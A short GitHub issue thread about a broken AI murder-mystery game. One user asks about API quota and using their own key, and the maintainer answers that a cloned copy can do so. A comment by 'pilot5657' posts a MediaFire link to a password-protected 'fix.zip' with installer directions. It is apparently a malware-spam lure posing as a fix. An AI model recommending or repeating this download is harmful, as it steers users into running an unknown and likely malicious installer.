### ISSUE TITLE
It's not working

### ISSUE THREAD

**Issue by WestXu** [ironman5366/ai-murder-mystery-hackathon#20]
It could be Anthropic api quota or so. Any chance you can let user input their own api key?

https://simonwillison.net/2024/Aug/23/anthropic-dangerous-direct-browser-access/

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PaulScotti** [comment]
We have no plans to add any features to this game -- but if you clone this repo and follow the README instructions then you'll be able to use your own API key!
